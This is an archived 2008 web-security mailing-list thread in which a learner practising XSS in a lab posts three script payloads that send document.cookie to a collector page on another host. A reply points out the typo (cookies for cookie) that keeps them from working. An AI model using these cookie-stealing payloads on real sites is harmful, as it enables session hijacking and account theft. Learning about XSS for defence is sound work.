[WEB SECURITY] XSS Help

romain r at fuckthespam.com
Thu Jun 5 10:53:55 EDT 2008


Well, the last one should work if you remove the 's' at cookies.
The variable is document.cookie.
Otherwise, document.cookie is a variable accessible from JS, not HTML directly which means 
  that if you write: <a href="document.cookie"> (close to your <script> stuff) it will 
write 'document.cookie' in your address bar and not the content of it.



R.
   http://rgaucher.info

GsNaseer Gs wrote:
> Hi!
>  
> I am new to this forum, I was practising to learn to concepts of 
> XSS(Cross-Site-Scripting), I am using two different applications on two 
> different machines. i want to dump cookies of one application into 
> another application database. For that i am using
> this script to send cookies, 
>  
> <script 
> src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+document.cookies>
>  
> <script 
> src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+escape(document.cookies)>
>  
> <script>new 
> Image().src="http://192.168.100.200/Testing/CookiesAdd.aspx?Ck="+encodeURI(document.cookies)</script>
>  
> /*Non of these scripts are working for me*/
>  
> i am able to dump a blank record without any cookies values (null) , i 
> am trying out this on IE 7
>  
> pls can anybody help me, and guide to through where i am wrong........
>  
>  
> Thanks
>  
>  
>  
>  
> 
> ------------------------------------------------------------------------
> Best Jokes, Best Friends, Best Food. Get all this and more on Best of 
> Yahoo! Groups. 
> <http://in.rd.yahoo.com/tagline_groups_11/*http://in.promos.yahoo.com/groups/bestofyahoo/>

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list